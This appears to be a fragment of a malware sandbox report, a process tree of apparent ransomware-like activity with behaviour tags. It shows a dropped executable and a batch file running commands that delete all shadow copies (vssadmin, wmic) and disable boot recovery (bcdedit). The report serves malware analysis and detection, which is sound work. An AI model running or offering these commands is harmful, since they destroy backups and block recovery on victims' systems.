C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:5676
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5492
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\lZgqBLCp.bat"1⤵PID:4904
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4984
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4420
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1008
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:2500
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032